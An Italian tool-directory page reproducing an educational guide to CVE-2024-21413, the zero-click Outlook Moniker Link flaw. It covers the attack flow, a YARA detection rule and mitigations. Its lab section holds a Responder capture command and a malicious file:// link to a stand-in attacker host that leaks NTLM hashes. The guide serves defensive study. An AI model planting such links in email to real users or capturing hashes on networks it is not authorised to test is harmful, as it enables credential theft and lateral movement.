Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Moniker-Link--CVE-2024-21413- — Guida educativa su CVE-2024-21413, la vulnerabilità Outlook zero-click Moniker Link, che copre il flusso dell'attacco, la cattura delle credenziali NTLM, il rilevamento con YARA e le strategie di mitigazione. | Kitploit
Strumenti/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
Password CrackingStrumenti di PhishingAnalisi delle VulnerabilitàExploitEvasione IDS/IPSMovimento LateralePenetration TestingApprendimento e FormazioneRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sicurezza Email
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

Guida educativa su CVE-2024-21413, la vulnerabilità Outlook zero-click Moniker Link, che copre il flusso dell'attacco, la cattura delle credenziali NTLM, il rilevamento con YARA e le strategie di mitigazione.

Vedi Repository
64 mesi faNon ancora revisionato

🔗 Moniker Link (CVE-2024-21413) — Una Guida Pratica alla Vulnerabilità Zero-Click di Outlook


📌 1. Introduzione

CVE-2024-21413, comunemente nota come vulnerabilità Moniker Link, è una grave falla di sicurezza in Microsoft Outlook che consente agli aggressori di divulgare le credenziali degli utenti senza richiedere alcuna interazione.

A differenza dei tradizionali attacchi di phishing, questa vulnerabilità può essere attivata semplicemente visualizzando un'anteprima dell'email, rendendola particolarmente pericolosa in ambienti aziendali.

Il problema deriva da come Outlook elabora i moniker link, causando tentativi di autenticazione indesiderati verso sistemi controllati dall'aggressore.


🧠 2. Concetti Chiave

Comprendere i seguenti concetti è essenziale:

🔹 Moniker Link

Un meccanismo specifico di Windows che consente alle applicazioni di fare riferimento a risorse esterne utilizzando protocolli come:

  • file://
  • unc://

🔹 Autenticazione NTLM

  • Un protocollo di autenticazione legacy di Windows
  • Invia automaticamente credenziali hash quando si accede a risorse remote
  • Suscettibile ad attacchi di cattura e relay di credenziali

🔹 Percorso UNC (Universal Naming Convention)

root@kitploit:~
\\attacker-server\share

Utilizzato per accedere a risorse condivise su una rete. In questa vulnerabilità, viene abusato per forzare richieste di autenticazione.

🔹 Bypass della Visualizzazione Protetta

La Visualizzazione Protetta di Outlook è progettata per isolare contenuti potenzialmente pericolosi. Questa vulnerabilità bypassa tale protezione, consentendo l'accesso a risorse esterne.


⚙️ 3. Come Funziona

Flusso dell'Attacco (Passo dopo Passo)

  1. Creazione del Payload

    • L'aggressore inserisce un moniker link dannoso (ad es., file://attacker-server/share) all'interno di un'email.
  2. Consegna

    • L'email viene inviata alla vittima.
  3. Attivazione

    • La vittima visualizza l'anteprima o apre l'email in Outlook.
  4. Elaborazione Automatica

    • Outlook elabora il link senza interazione dell'utente.
  5. Richiesta di Autenticazione

    • Windows tenta l'autenticazione NTLM verso il server dell'aggressore.
  6. Esposizione delle Credenziali

    • L'aggressore cattura l'hash NTLM.

Diagramma del Flusso dell'Attacco

root@kitploit:~
[Attacker]
    |
    | 1. Send crafted email
    v
[Victim Outlook]
    |
    | 2. Auto-process moniker link
    v
[Windows System]
    |
    | 3. NTLM authentication attempt
    v
[Attacker Server]
    |
    | 4. Capture NTLM hash
    v
[Credential Abuse / Lateral Movement]

🌍 4. Impatto nel Mondo Reale

Scenari di Attacco Comuni

  • Campagne di phishing mirate contro organizzazioni
  • Raccolta di credenziali in reti aziendali
  • Accesso iniziale per movimento laterale

Obiettivi dell'Attaccante

  • Catturare hash NTLM
  • Fare relay dell'autenticazione verso servizi interni
  • Elevare i privilegi all'interno della rete

🛠️ 5. Strumenti e Tecnologie

Strumenti Offensivi / di Ricerca

  • Responder — Cattura hash di autenticazione NTLM
  • Impacket — Toolkit di sfruttamento di rete
  • ntlmrelayx.py — Esegue attacchi di relay NTLM

Strumenti Difensivi

  • Microsoft Defender — Rilevamento e risposta su endpoint
  • Wireshark — Ispezione del traffico di rete
  • Sysmon — Registrazione avanzata degli eventi di sistema

💻 6. Esempio Pratico (Solo in Ambiente di Laboratorio)

⚠️ Eseguire solo in ambienti di laboratorio controllati

Avviare il Servizio di Cattura NTLM

root@kitploit:~
sudo responder -I eth0

Esempio di Link Dannoso

root@kitploit:~
<a href="file://attacker-ip/share">Open Document</a>

Output Previsto

root@kitploit:~
[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. Rilevamento (Regola YARA)

Una regola di rilevamento è stata sviluppata da Florian Roth per identificare tentativi di sfruttamento che coinvolgono moniker link.

Esempio di Regola YARA

root@kitploit:~
rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

Casi d'Uso di Rilevamento

  • Scansione del gateway email
  • Generazione di allarmi SIEM
  • Caccia alle minacce per link sospetti

🛡️ 8. Mitigazione e Buone Pratiche

Gestione delle Patch

  • Applicare immediatamente gli aggiornamenti di sicurezza forniti da Microsoft

Rafforzamento dell'Autenticazione

  • Disabilitare NTLM dove possibile
  • Imporre l'autenticazione Kerberos

Controlli di Rete

  • Bloccare SMB in uscita (TCP 445) verso reti esterne
  • Limitare le connessioni in uscita non necessarie

Sicurezza Email

  • Filtrare o bonificare i link file:// e basati su UNC
  • Utilizzare soluzioni avanzate di protezione dalle minacce email

Monitoraggio e Rilevamento

  • Monitorare i tentativi di autenticazione in uscita
  • Registrare e allertare il traffico SMB anomalo

⚠️ 9. Errori Comuni

  • Presumere che sia richiesta l'interazione dell'utente
  • Ignorare i rischi legati a NTLM in ambienti moderni
  • Affidarsi esclusivamente all'antivirus senza controlli di rete
  • Ritardare l'implementazione delle patch

🧾 10. Conclusione

CVE-2024-21413 dimostra come comportamenti di sistema profondamente integrati (come l'autenticazione automatica) possano essere sfruttati attraverso input apparentemente innocui come i link nelle email.

Punti Chiave

  • Vulnerabilità Zero-Click — nessuna interazione dell'utente richiesta
  • Sfrutta la gestione dei moniker link da parte di Outlook
  • Provoca la fuoriuscita di credenziali NTLM
  • Rilevabile tramite YARA e monitoraggio di rete
  • Prevenibile tramite patch e configurazione appropriata

📚 11. Ulteriori Letture

  • Microsoft Security Advisory — CVE-2024-21413
  • Impacket Documentation (NTLM Relay Attacks)
  • YARA Documentation
  • OWASP Authentication Cheat Sheet

💡 Raccomandazione: Riprodurre questa vulnerabilità in un laboratorio virtuale (ad es., VM Windows + VM attaccante) per comprendere appieno la catena di attacco e le strategie difensive.

Scarica lo strumento